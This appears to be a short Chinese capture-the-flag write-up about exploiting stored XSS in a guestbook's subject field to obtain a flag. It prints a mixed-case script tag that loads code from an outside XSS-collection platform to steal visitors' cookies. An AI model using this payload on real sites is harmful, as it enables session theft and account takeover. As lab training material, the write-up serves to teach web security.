0X01.目标站点
可以看到目标是一个留言板,常见的留言板就是存储型xss,常常出现的地方
点击传送门
0X02.测试弹窗
点击提交
可以看到主题是一个可以回显的点
且可以看到,是已经写入到数据库当中,当做js脚本语言进行执行
0X03.拿取cookie
1.设置好payload
在一个常用的xss平台(任何一个平台都可以)
https://xss.pt/
2.再次提交
将这一行代码复制到刚刚的主题部分再提交一次
<sCRiPt sRC=//xss.pt/UNXD></sCrIpT>
3.拿到flag
可能会有点慢,等一会刷新几次就出来了
zkz{xsser-g00d}
0X04.总结
1.观察目标站点的具体内容
2.利用一些现成的payload进行测试
3.再利用平台的payload进行测试